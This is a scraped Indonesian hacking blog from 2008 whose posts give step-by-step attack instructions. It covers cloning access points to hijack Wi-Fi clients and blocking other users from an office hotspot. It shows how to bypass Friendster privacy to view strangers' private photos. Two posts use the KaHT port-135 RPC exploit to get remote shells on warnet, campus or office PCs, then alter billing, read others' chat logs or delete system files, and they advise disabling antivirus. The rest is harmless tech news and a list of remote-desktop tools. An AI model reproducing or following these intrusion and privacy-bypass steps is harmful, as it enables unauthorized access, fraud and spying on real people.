SSID nya default dari pabrik... kemungkinan settingannya juga masih default... cari di internet IP Defaultnya + password Defaultnya. 03.3 Channel Channel yang dipergunakan oleh AP tertera disini. Proses Hacking yang bisa dialkukan : . Membuat AP tandingan dengan SSID + Channel yang sama 03.4 Speed Informasi yang didapatkan : . 54 Mbps ----> AP beneran . 11 Mbps ----> WiFi Card yang dibentuk menjadi AP Proses Hacking yang bisa dilakukan : . 11 Mbps ----> Flooding Packet secara terus-menerus 03.4 Vendor . Informasi Vendor pembuat AP . Jika vendor tidak termasuk dalam daftar NetStumbler akan tertulis 'Fake' ini artinya bisa kemungkinan 'Fake AP' bisa kemungkinan memang tidak terditeksi. Proses Hacking yang bisa dilakukan : . Hacking melalui IP default AP, User Defaut dan Password Default 03.6 Type Infromasi yg bisa didapatkan : . AP ---> benar2 AP . Peer ---> AdHoc koneksi ( WiFi Card yg dijadikan AP | WiFi Card yd di set SSID) 03.7 Encription Informasi yang didapatkan adalah WEP atau Tidak, sekalipun AP diset dengan enkripsi WPA tetap saja akan tertulis WEP. Proses Hacking yang bisa dilakukan : . kracking WEP . kracking WPA 03.8 IP Address & Subnet Informasi yang didapatkan : . IP dan Subnet jika kita dalam 1 network. Proses Hacking yang bisa dialkukan : . Gainning ke IP tersebut . AP Injection from client 04.8 Hal2 lain seperti : SNR, Signal, Noise hanya menjelaskan kekuatan signal saja. uuupppsss... itu pembelajaran untuk Anda dan teman2 semua... semoga saja bermanfaat... tindak lanjut dari proses WarDriving banyak sekali yg bisa kita coba..... sampai ketemu pada materi saya berikutnya..... Melemahkan AP With AP ---------------------- hai... ketemu lagi dengan lirva nih.... mudah2an ga bosen... kali ini lirva mo ngebahas bagaimana caranya melemahkan AP dengan AP Dasar Teori : Dalam 1 network jaringan W-LAN kita hanya boleh membentuk SSID dengan nama SSID yang uniq dalam 1 Channel, nah artinya SSID ga boleh ada yg kembar dalam 1 Channel.... karena Faktor inilah saya akan memanfaatkan dalam proses hacking.... saya akan melumpuhkan AP dengan AP. Bagaimana caranya : . Siapkan Peralatan yang dibutuhkan : [01] Access Point & WiFi Card [02] NetStumbler.. boleh juga aplikasi lainnya [/me pake windows..soalnya wifi /me ga ke ditek di linux... he..he...he... [03] Antena yg memiliki gain yang baik dan bagus (11 dbi) yg akan digunakan sbg antena pengganti pada AP. . Cara melemahkan : [01] Aktifkan NetStumbler... perhatikan SSID (termasuk huruf besar dan huruf kecilnya ya.... krn SSID itu case sensitif.... terus perhatikan juga Channel yang dipergunakan... [02] Nah, sekarang girilan Anda nge-set AP yang Anda miliki... set lah SSID sesuai sesuai dengan SSID milik si target.. set lah Channel sesuai dengan Channel milik target.... . Hasil Sementara : [01] autoreflector pada WiFi client di Windows akan mencari Signal tertinggi, ini yang membuat client secara otomatis terhubung ke AP milik kita. [02] Signal AP yang tertinggi akan mengalahkan signal AP yang terendah illegal Freeze The AP -- a.k.a Access Point -- User . ------------------------------------------------------------------------------- Wah... lirva cerita lagi nih... CONTOH kasusnya : Di sebuah kantor tuh ada hotspot... nah kalo pas siang tuh karyawan banyak yang connet to AP untuk pake inet... itu artinya makin banyak user yang connect berarti throughput AP pasti turun drastis.... inetnya jadi lambat... Nah, kali ini lirva cuma iseng... lirva Ngeblock tuh MAC Address user2 lain biar semestara mereka 'ga connect..... Spesifikasi yang me pake : . WiFi Card PCI : D-Link DWL-G10 AirPlus . OS : Windows XP Spesifikasi target : . Access Point : WRT54G . Firmware : Firmware 5.0 Aplikasi yang dibutuhkan : . MC Afee Wireless Home Network Security ini adalah proses melakukan 'blocking ' terhadap user2 yang lagi connect ke AP : 01. Pastikan WiFi card bisa connect ke AP [biasanya dikantor kan emang udah diset WiFi di PC oleh si Admin... mulai SSID sampe Enkripsinya] 02. Pastikan punya hak install2 software... Nah kalo ga bisa install gimana..??? banyak cara yang bisa dipergunakan.... 03. Install MC Afee : WiFi Home Network Security di PC yang kita miliki 04. Kalau MC Afee udah diinstall... jalanin dech tuh aplikasi... pasti akan menditeksi AP yang ada... tinggal pilih AP target terus double clik saja.... pasti muncul banyak MAC Address yang lagi connect ke AP.... 05. Nah, kini saat Anda untuk memilih MAC Address sasaran... terus klik kanan aze... pilih "Block"... udah dech.... tuh user utk sementara ga bisa connet ke AP... tapi pastikan dengan baik kalo yg di block itu bukan MAC diri sendiri....... User busa connect lagi ke AP kalo kita laksanain UnBlock..... Nah itu caranya.... 'ga musti Admin kan yang bisa Ngeblock... n ga perlu masuk2 menu AP yang dipassword Admin.... Selamat mencoba.................. lumayan nih, buat tambah2 nutrisi otak..... Happy haking

Undeepfreeze V6

2008-12-17T21:30:00.000-08:00

Bagi yang pake DeepFreeze v.5 sih kayaknya kurang begitu masalah, karena sudah tersedia software untuk mendisable-nya (tinggal cari aja di i-net Deep UnFreeze), namun untuk DeepFreeze v.6 sampai saat masih susah untuk mendapatkan antinya. Tapi jangan bersedih hati dulu, karena ternyata masih bisa untuk di disable bahkan di uninstall. Ini saya dapat dari pengalaman sendiri yang secara tidak sengaja saya merepair kompi lab yang rusak systemnya, dan tentunya DeepFreeze v.6 yg saya pasang belum di disable.

Untuk lebih jelas, langkah2-nya adalah sebagai berikut:

1. Siapkan CDROM dan CD Installer Windos XP nya

2. Atur First Boot priority nya menjadi CD-ROM

3. Restart Kompi dan pilih boot from CD-ROM

4. Ikuti langkah2 seperti pada saat install Windos

5. Sampai pada bagian Enter to Setup … Enterlah lalu tekan F8 untuk persetujuan dan tunggu beberapa saat

6. Lalu tekan R untuk repair (Repair Setup)

7. Selanjutnya ikuti langkah2 install windos berikutnya sampe selese.

8. Sekarang siapkan DeepFreeze v.6 nya dan double klik

9. Maka akan muncul jendela unInstall DeepFreeze dan lakukan proses uninstall sampai selese

10. Sekarang masalah sudah kelar…

Tinggal pilih mo di install DeepFreeze lagi ato tidak? Kalo mo diinstall lagi, pastikan dulu kita tahu passwordnya OK!

Sekarang lupa password DeepFreeze V.6, ga perlu install ulang deh… :)

NB: saya tidak bertanggung jawab atas penyalahgunaan artikel ini, saya bermaksud untuk berbagi aja karena saya lihat banyak yang mengalami masalah seperti ini dan bingung cara menghadapinya, akhirnya mereka install ulang deh kompinya… (:

Oya, ketinggalan nih… Silahkan tinggalkan pesan, kritik, saran, atau tambahan. Mungkin ada yang menemukan cara lain yang lebih efektif, dishare aja di sini… :)

Semoga bermanfaat !!!

Hacking Private Photo Friendster

2008-12-16T20:55:00.000-08:00

In FRIENDSTER, some people can hide some photos that they upload into friendster albums. Usually this photos is private picture or something like secret picture. If we want to see that picture, we must ask permission from the owner..
2 days ago, i found some hacking into this private photo, so we can see private photos from other people friendster account..
The 3 things that you must do to see the private photo is
1. target uid

example : http://www.friendster.com/53349334

41082848 - is target UID ( it's just example, so find your target first )

2. target album id write this address into your addressbar http://www.friendster.com/viewalbums.php?uid="Your target uid here"

example : http://www.friendster.com/viewalbums.php?uid=53349334

Select View - Page Source from the browser menu, and then find "abAlbumPrivacy" near the word private

example :

"abAlbumPrivacy-1" -- all you need is the number in the end of word,
in this case the number is 1 ( one )

3. Open
http://www.friendster.com/photolist_ajax.php?uid="your target uid here"&a="album privacy id here"&page=0

example :
http://www.friendster.com/photolist_ajax.php?uid=53349334&a=1&page=0

You will get result like this..

{"photos":[{"isPrimary":"0","privacy":"1","pid":"1","rid":"851208344","album_id":"1","guid":"b799e48214..etc.

All you need is "rid":"851208344" -- remember the number "851208344" this is the photo id .

After the three thing finished, go back to the http://www.friendster.com/viewalbums.php?uid=53349334

right click on one of the image that apear, and then choose properties. See under the image properties

location : ....

example :

location : http://photos-p.friendster.com/photos/43/39/53349334/1_363513051m.jpg

Copy the url into your address bar, and then replace the name of image with number that you got before..

example :

before - http://photos-p.friendster.com/photos/43/39/53349334/1_363513051m.jpg

the name of image is 1_363513051m.jpg, replace 363513051m with "851208344" that you get from "rid":"851208344", so now become 1_851208344.jpg

after - http://photos-p.friendster.com/photos/43/39/53349334/1_851208344.jpg

Now you will see the private photos..^^

NB : if your target have more than one private photos, they must be have more than "rid":"851208344" texts, just search the other number than "851208344" and do the last process in this article again.. Just use your brain.. =p

12 Layanan Remote Desktop Gratis Terbaik

2008-11-25T22:38:00.000-08:00

Berikut adalah beberapa layanan Remote Desktop Gratis yang tersedia di Internet. Masing-masing memiliki karakteristik serta fitur yang berbeda. Beberapa di antaranya merupakan layanan berbasis web di mana kita harus terlebih dahulu mendaftar dan melakukan instalasi satu program kecil, ada pula yang bersifat stand alone sehingga mengakses komputer dapat dilakukan lewat jalur VPN. Selain itu ada pula yang berkemampuan untuk berbagi layar desktop bagi lengkap dengan fasilitas chat dan VOIP yang biasanya berguna untuk melakukan pelatihan atau presentasi jarak jauh dan bahkan ada pula yang memungkinkan kita untuk melakukan remote desktop melalui handphone atau PDA.

Yuugu
Menggunakan Yuuguu untuk berbagi layar desktop via Web, anda dapat meminta peserta untuk berbagi kontrol layar dan bekerja sama secara real time melalui web. Sangat membantu untuk bekerja sama menyuntung sebuah dokumen, mempercepat proses pembuatan dokumen dan presentasi secara online.

LogMeIn
Cukup instal LogMeIn pada komputer yang ingin diakses dan kita akan dapat melakukan remote terhadap PC atau Mac dari mana saja hanya menggunakan sebuah browser. Apapun dapat dilakukan seolah-olah secara fisik berada di depan PC atau Mac yang sedang di remote.

CrossLoop
CrossLoop memungkinkan kita untuk melihat layar, kendali atas mouse dan keyboard pada komputer remote. Dalam promosinya CrossLoop dapat dijalankan dalam waktu kurang dari 2 menit. Cukup download dan instal aplikasi dan akan secara otomatis mengkonfigurasi sendiri untuk lingkungan jaringan komputer anda.

ShowMyPC
ShowMyPC memungkinkan kita untuk berkolaborasi dalam melakukan Remote Desktop. Cocok sebagai alternatif untuk yang Anda yang sudah biasa menggunakan WebEx atau Gotomypc. Beberapa kelebihannya antara lain gratis, tidak perlu instalasi, pendaftaran, tidak perlu login. Juga memiliki fitur chatting, White-Board dan mampu merekam layar. Dibangun menggunakan standar SSH VNC serta menyediakan layanan Premium Hosting.

SkyFex
Menggunakan SkyFex Remote Assitant memungkinkan kita menyaksikan dan mengakses komputer dari jauh secara real time. Skyfex tidak memerlukan tambahan software dan bekerja melalui proxy, firewall atau NAT pada jaringan. SkyFex adalah layanan berbasis Windows dan membutuhkan Internet Explorer.

TeamViewer
Selain dapat melakukan remote desktop, TeamViewer dilengkapi dengan fitur transfer file yang memungkinkan kita menyalin file dan folder dari dan ke komputer yang sedang diakses.

Untuk memasang TeamViewer tidak diperlukan hak Administrator. Cukup jalankan software dan jangan lupa untuk mematikannya setelah selesai. Jika menggunakan TeamViewer tidak perlu khawatir tentang firewall karena TeamViewer akan menemukan cara komunikasi secara otomatis. Untuk penggunaan non-komersial tersedia secara gratis.

Gooer
Pertama kita harus mengunduh dan menginstal Gooer pada semua komputer yang ingin diakses. Setelah itu komputer dapat diakses menggunakan PC atau perangkat Mobile. Pengguna PC bisa menggunakan sebuah browser (IE, Firefox atau web browser lain yang mendukung Java) sedangkan pengguna mobile dapat mengunjungi wap.gooer.com untuk mendapatkan aplikasi berbasis Java yang tersedia untuk klien perangkat Mobiles/PDA.

Jika ingin mengakses remote komputer melalui ponsel atau PDA, Anda harus memasang di atas Gooer Host Software PC ke host pertama, setelah itu Anda dapat men-download software ini, Anda kirimkan ke perangkat mobile dan menginstalnya.

Microsoft SharedView
Untuk memulai sesi program ini Anda harus terlebih dahulu sign in menggunakan Windows Live ID. Jika Anda ingin memulai sesi dan tidak memiliki Windows Live ID, Anda dapat menginstalas program ini namun sebelum masuk, Anda tetap memiliki Windows Live ID.

Yakkle
Yakkle dibangun menggunakan platform Java. Fungsi remote desktop sharing sebenarnya hanya salah satu fitur yang tersedia selain Instant Messaging, File Sharing, Video dan Conference. Yakkle dapat saling berkomunikasi dengan Gmail serta Jabber. Yakkle juga mampu berintegrasi dengan account Twitter.

DimDim
Dimdim Web Meeting tersedia dalam edisi open source maupun komersiil yang mampu mendukung ribuan peserta. Tidak seperti layanan web meeting sebelumnya, Dimdim tersedia secara online atau kita juga dapat menginstalnya di server pribadi.

Desktra

Untuk menggunakan DESKTRA, unduh dulu file "FreedomSetup1_1.exe", instal pada PC yang ingin diakses dari internet. PC ini disebut "HOST". Windows perlu reboot untuk menyelesaikan instalasi. Setelah reboot gunakan akun yang sama saat meng-install DESKTRA untuk melanjutkan proses instalasi.

PC tersebut akan dipromosikan dengan DESKTRA Freedom Desktop Server Control Panel. ID baru otomatis dibuat ketika "DESKTRA Freedom Server.exe" berjalan untuk pertama kalinya. Isi password yang Anda inginkan dan klik tombol "Start" untuk memulainya.

Remobo

Beberapa keunggulan yang dimilikinya:
• Zero-Configuration: instal dan Anda siap digunakan! Tidak perlu konfigurasi yang rumit mengubah setting jaringan, ataupun firewall untuk memulainya.
• Mudah pakai: akses komputer dari manapun selama dalam dalam daftar Anda dunia!
• Aman: semua data dienkripsi dan private agar tidak ada orang lain dapat melihatnya. Tentu saja NO spyware atau adware apapun!
• Cepat: Remobo akan mencoba untuk membuat koneksi secara langsung atau peer-to-peer antara komputer untuk mendapatkan kecepatan terbaik.
• Fleksibel: dilengkapi dengan akses remote desktop, file sharing & VPN.

Baca Selengkapnya disini....!!

Mematikan Komputer lawan dalam satu jringan

2008-11-23T20:56:00.000-08:00

Konsep untuk mematikan komputer ini sangatlah sederhana hal-hal yang diperlukan hanyalah dua buah komputer yang terkoneksi melalui jaringan LAN maupun internet dan mempunya IP addressnya masing-masing. Selanjutnya masing-masing komputer diberikan service telnet ataupun ssh sebagai server yang aktif.

Setelah terkoneksi, untuk mematikan komputer pun gak sulit ko’ karena hanya dibutuhkan beberapa baris command yang mudah. Oleh karena itu marilah kita lihat lebih jauh lagi bagaimana cara untuk mematikan komputer melalui service ssh maupun telnet.

A. System Requirements
1. Operating System yang mendukung networking. Dalam project ini kami menggunakan Windows XP.
2. 2 network interface card.
3. Kabel LAN dengan jack RJ-45.
4. Menggunakan Peer to Peer connection.

B. Langkah-langkah mengaktifkan telnet server:
Pada dasarnya setiap windows XP sudah terdapat services telnet namun services ini tidak diaktifkan.
1. Buka Control Panel, pilih Administration Tools, pilih Services.
2. Cari telnet services buka dengan klik dua kali.
3. Aktifkan telnet service pada modus automatic sehingga saat komputer direstart service ini pun tetap aktif.
4. Karena kita tidak ingin melakukan restart lakukan pengaktifan telnet service dengan mengetik start.

C. Langkah-langkah mengaktifkan ssh server:
Linux yang kita gunakan adalah versi debian ubuntu pada linux versi ini ssh-server tidak terdapat dalam sistem, oleh karena itu dibutuhkan penginstallan aplikasi ini.
1. Pastikan komputer terkoneksi dengan internet.
2. sudo apt-get update (untuk mengupdate repisotory)
3. sudo apt-get install openssh-server.

D. Langkah-langkah mempersiapkan telnet client.
1. Untuk windows cukup mengaktifkan command prompt di dalam windows.
2. Untuk linux cukup mengaktikan terminal melalui start menu program.

E. Langkah-langkah mempersiapkan ssh client.
1. Untuk linux buka terminal melalui start menu program.
2. Untuk windows dapat menggunakan program tambahan semisal putty.

F. Mekanisme kerja:
Konsep yang perlu diperhatikan adalah:
1. SSH terdiri dari dua jenis yaitu ssh-server dan ssh-client.
2. Telnet terdiri dari dua jenis yaitu telnet-server dan telnet-client.
3. Ssh-server hanya dapat berjalan di pc berbasis linux.
4. Telnet-server hanya dapat berjalan di pc berbasis windows.
5. Basic command dari ssh mirip dengan basic comand di terminal linux.
6. Basic command dari telnet mirip dengan basic command di command prompt windows.
7. Ssh-client dapat berjalan di linux cukup dengan menggunakan terminal dari linux itu sendiri.
8. Ssh-client dapat berjalan di windows dengan menggunakan program tambahan putty.
9. Telnet-client dapat berjalan di linux cukup dengan menggunakan terminal dari linux itu sendiri.
10. Telnet-client dapat berjalan di windows dengan menggunakan command prompt dari windows itu sendiri.

G. Mematikan komputer melalui service ssh.
Pada konsepnya adalah sebagai berikut
Komputer 1 > Komputer 2
Ssh-client Ssh-server
Komputer 1 akan mencoba untuk mematikan komputer 2 oleh karena itu berikut beberapa prinsip:
1. Ssh-client dapat berupa windows ataupun linux.
2. Ssh-server hanya dapat dijalankan di linux.

Step melalui terminal linux:
1. Buka terminal linux.
2. Ketikan ssh user_name@ip_address
3. Masukkan password
4. Ketikkan sudo shutdown –h now

Wajib anda ketahui :
1. user_name adalah user name yang dipakai di komputer linux yang akan dimatikan
2. ip_address adalah alamat ip yang dipakai di komputer linux yang akan dimatikan.
3. sudo menyatakan diri kita sebagai root atau administrator yang berhak.
4. –h menyatakan untuk mematikan keseluruhan sitem.
5. now menyatakan untuk mematikan pada saat command itu diexecute.

H. Mematikan komputer melalui service telnet.
Pada konsepnya adalah sebagai berikut.
Komputer 1 > Komputer 2
Telnet-client Telnet-server.
Komputer 1 akan mencoba untuk mematikan komputer oleh karena itu berikut beberapa prinsip:
1. Telnet-client dapat berupa windows ataupun linux.
2. Telnet-server hanya dapat dijalankan di windows.
3. Step melalui command prompt windows.
4. Buka terminal windows.
5. Ketikan telnet ip_address;
6. Masukkan password.
7. Ketikkan shutdown –s

Wajib anda ketahui :
>1. user_name adalah user name yang di pakai di komputer 2 atau komputer windows yang akan dimatikan.
2. Ip_address adalah alamat ip komputer yang akan dimatikan.
3. –s menyatakan untuk mematikan komputer sekarang juga.

Nb ;
1. Mematikan PC dari jarak jauh ga sulit ko’ asalkan jaringannya berbasis ipaddress
2. Saya sarankan firewall pada PC anda sebaiknya dimatikan azha coz dapat mengganggu kelancaran proses ini.
3. Tidak semua komputer yang memiliki ipaddress public dapat dikoneksikan melalui telnet dan ssh karena banyaknya router yang bersifat secure dengan tidak memperbolehkan koneksi dengan port tertentu.
4. Klo ada yang kurang ato salah mohon dimaafin ato dibenerin yach, coz aku hanya mahluk Allah SWT yang tercipta dari rangkaian kekurangan.

OS Minority Report Menjadi Kenyataan

2008-11-21T23:53:00.000-08:00

Bersiaplah untuk terkagum-kagum. Sekelompok visionaris telah berhasil menciptakan user interface (UI) touchless (berbasis gerakan tangan) yang diperlihatkan di film Minority Report yang dibintangi Tom Cruise di tahun 2002. Apabila saat menonton film tersebut Anda berpikir "UI semacam itu tidak akan dibuat saat saya masih hidup" atau mengira touchless SDK yang dirilis Microsoft tidak berpotensi — tampaknya Anda salah.

UI ini ternyata tidak hanya sudah ada, tetapi setelah dikembangkan selama beberapa tahun, teknologi ini telah memasuki tahap komersiil dalam bentuk g-speak, sebuah sistem baru yang disebut spatial operating environment (SOE). Apabila Anda merasa g-speak sangat mirip dengan komputer dalam Minority Report, hal itu dikarenakan pendiri Oblong Industries, pencipta g-speak merupakan salah seorang penasihat teknologi film tersebut.

Mozilla Luncurkan Fashion Your Firefox

2008-11-21T23:50:00.000-08:00

Mozilla telah meluncurkan "Fashion Your Firefox," sebuah aplikasi berbasis web yang bertujuan untuk memudahkan pengguna Firefox untuk dengan mudah mengkustomisasi Firefox berdasarkan hobi dan aktivitas onlinenya. Melalui Fashion for Firefox, Mozilla mengumpulkan berbagai jenis add-on Firefox ke dalam berbagai kategori berdasarkan gaya hidup online pengguna agar dapat ditemukan dan di-instal hanya dengan beberapa klik saja.

Saat mengunjungi situs Fashion Your Firefox Anda akan melihat berbagai kategori seperti:

* Shutterbug: melihat dan berbagi foto dan video online
* Rock Star: menikmati musik saat berselancar, bekerja, mengirim email atau melakukan riset online
* News Junkie: menemukan berita dan ramalan cuaca terbaru
* Shopaholic: berbelanja dan menemukan berbagai promosi online
* Digital Pack Rat: mengikuti situs-situs, bookmark dan blog favorit Anda
* Social Butterfly: berbagi, bookmark dan email situs halaman melalui berbagai situs jejaring dan bookmarking sosial
* Finder and Seeker: menemukan informasi yang lebih relevan di web
* Decorator: menggunakan tema browser
*
* Executive Assistant
: mengorganisasi aktivitas online

Fashion Your Firefox sangat berguna untuk menemukan berbagai add-on baru yang berguna tetapi tidak itu saja, meng-instal add-on di situs ini juga lebih mudah karena Anda dapat mengisi beberapa checkbox yang ada di samping setiap add-on yang Anda mau dan menginstal semuanya secara sekaligus melalui tombol "Install my Add-ons."

Microsoft Akan Rilis Antivirus Gratis

2008-11-21T23:38:00.000-08:00

Untuk memenuhi kebutuhan keamanan PC di negara berkembang, PC berukuran kecil dan terus bertambahnya malware, Microsoft berencana untuk mengeluarkan produk sekuriti baru dengan kode nama "Morro" di pertengahan kedua 2009 yang menawarkan perlindungan terhadap virus, spyware, rootkit dan trojan. Solusi ini akan disediakan secara bebas biaya kepada para konsumen dan dirancang untuk menggunakan sumber daya seminimal mungkin, ideal untuk PC dengan spesifikasi yang lebih rendah.

Amy Barzdukaz, direktur senior manajemen produk untuk divisi layanan online dan Windows di Microsoft mengatakan bahwa "pelanggan di seluruh dunia mengatakan kepada kami bahwa mereka membutuhkan perlindungan lengkap yang terus menerus dari ancaman-ancaman keamanan baru, dan kami dengan serius menanggapi kekhawatiran mereka. Produk baru yang gratis ini memungkinkan kita untuk melindungi lebih banyak lagi konsumen, terutama di wilayah di mana tingkat pertumbuhan PC baru hanya dikalahkan oleh tingkat pertumbuhan malware.

Morro akan menggunakan teknologi anti malware yang digunakan di produk Microsoft saat ini yang telah memenangkan penghargaan VB100 dari Virus Bulletin, sertifikasi Checkmark dari Coast Labs dan sertifikasi dari Internaional Computer Security Association Labs. Solusi baru ini akan mengantarkan perlindungan terhadap malware yang sudah ditawarkan melalui berbagai layanan korporat Microsoft, akan tetapi tidak akan mengemas banyak fitur yang tidak berhubungan dengan keamanan seperti produk keamanan lainnya.

Morro akan tersedia sebagai unduhan gratis untuk Windows XP, Windows Vista dan Windows 7. Saat digunakan dengan berbagai fitur keamanan dan privasi yang terus diperbaharui di Windows dan Internet Explorer, solusi baru ini menawarkan konsumen solusi keamanan gratis untuk melindungi dirinya dari sebagian besar ancaman keamanan online.

Windows Live OneCara yang menjadi produk keamanan unggulan Microsoft hari ini akan terus dijual untuk Windows XP dan Vista hingga tanggal 30 Juni 2009. Penjualan OneCare akan dihentikan secara bertahap saat Morro telah tersedia. (Microsoft)

Walaupun hal ini merupakan berita baik bagi semua pengguna Windows, berita ini merupakan kabar terburuk bagi banyak perusahaan yang berkecimpung dalam bisnis anti malware seperti Symantec, McAfee, Grisoft dan banyak lagi.

Coba dan lakukan.....!!!

2008-11-11T20:08:00.000-08:00

Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin

masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac

Berfungsi untuk mengetahui ip addreas client melalui computer name /

hostname

KaHT (KaHt.exe) … Download program hacker

KaHT

Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Untuk Windows XP

Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)

Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

Cara masuk DOS Mode

Untuk Windows XP :

Masuklah ke Start, All programs, Accessories lalu Command Prompt

Untuk Windows 95/98/Me/NT/2000

Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt

Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:KaH) maka ketikkan “CDKaHT” dan seterusnya. Jika sudah, ini saatnya?

Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : “KaHT Ip1 ip2″

ip1 : ip awal yang discan

ip2 : ip terahkir yang discan

Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1″ lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di “c:windowssystem” milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi :

Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:Program FilesMiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:program FilesMiRC program MiRCnya maka cukup masuk aja di C:Program FilesMiRCLogs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas

Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..

Catatan:

* Artikel diatas cuma sebagai media informasi saja, bukan sebagai media kejahatan / Hacker.

*Apabila anda mempraktekkan akibat ditanggung sendiri.

*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali.

Hacking Komptuter lawan.......!!

2008-11-09T21:22:00.003-08:00

Cara Membobol Komputer Lawan

Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol password komputer orang lain,

tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.

kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135,

yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools Kaht bisa anda download diWeblog kuliah online ilmu komputer .

Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.

Langkahnya :

1. Unzip file Kaht.zip

2. Letakkan pada direktori yang anda suka.

3. Masuk ke direktori tempat file berada melalui text mode

4. Tentukan sasaran pc yang akan di hacking

missal IP : 192.168.30.3 Kaht 192.168.30.1 192.168.30.3J

ika hacking anda berhasil akan tampil pada command line kira-kira sbb:

KAHT II - MASSIVE RPC EXPLOIT dst

[+] Target: 192.168.30.1-192.168.30.3 with 50 Treads

[+]Attacking Port:135.

Remote Shell at port:36388

[+] Scan In Progress……

- Connecting to 192.168.30.3 Sending Exploit to a [Win2k] Server- Connectando con la Shell Remote dst……..

C:WINNTsystem32>

Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai.

anda bisa membuat user admin membuat sharing dll Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan..

HTTP ATTACK untuk Script Kiddies

2008-11-09T20:44:00.001-08:00

Book Category : NEW RELEASE | Internet
ISBN 979-763-682-8
By Rachmad Saleh, Sulistyawan, M. Lutfi
14 X 21 cm, 140pages
2nd Published, 2008
Price: Rp.24000

Pengguna komputer seperti Anda, khususnya pengguna Internet, pasti sering mendengar istilah hacking. Berita tentang aktivtas para hacker (lebih tepatnya cracker) sudah banyak kita dengar. Bagaimana mereka membobol suatu situs web. Melakukan defacing, atau mendapatkan akses root dari suatu sistem operasi. Diakui atau tidak, semakin berkembangnya pengetahuan seorang attacker/penyusuplah yang menjadikan Internet seperti sekarang ini karena tanpa adanya pihak yang berusaha untuk mencari/mencoba kelemahan sebuah keamanan jaringan, khususnya website/situs, maka pengelola situs tersebut tidak akan tahu sejauh mana kehebatan/kelemahan racikannya.

